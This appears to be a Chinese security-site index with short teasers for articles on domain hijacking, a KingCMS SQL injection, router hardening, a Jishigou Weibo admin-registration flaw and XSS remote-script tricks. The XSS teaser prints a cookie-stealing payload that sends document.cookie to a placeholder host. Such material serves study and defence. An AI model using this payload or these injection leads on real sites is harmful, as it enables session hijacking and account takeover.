-
网站域名被劫持的原因分析和应对方法
1、域名劫持目前提供搜索引擎服务的产品很多,常用的如百度、谷歌、搜狗、有道等,他们应用的技术差别较大,核心技术一般都作为公司的技术机密,我们是不得而知,但都存在一个数据快照,存储在搜索引擎服务器上,当用户输人关键字时,搜索引擎通过搜索功能在...
-
kingcms最新版sql注入漏洞
api/uc.phpUC_KEY没有初始化导致注入<?phpdefine('UC_CLIENT_VERSION', '1.5.0'); //note UCenter 版本标识define('UC...
-
路由器基础设置
路由器是局域网连接外部网络的重要桥梁,是网络系统中不可或缺的重要部件,也是网络安全的前沿关口。但是路由器的维护却很少被大家所重视。试想,如果路由器连自身的安全都没有保障,整个网络也就毫无安全可言。因此在网络安全管理上,必须对路由器进行合理规...
-
记事狗微博全版本注册管理员漏洞
问题出在一个通用函数上,只要用到这个函数的都存在漏洞,爆管理账号密码的我就不写了,密码有salt意义不大。如果能绕过通用防注入,这套系就太多漏洞了。很多地方都是因为不能注释,闭合不了,而不能进行利用,虽然很多地方都能引入引号但是过滤了一些危...
-
xss中插入远程js的一些技巧
在早期 , 对于xss我们是这样利用的<code><script>window.open(‘http://xxx.xxx/cookie.asp?msg=’+document.cookie)</script>...
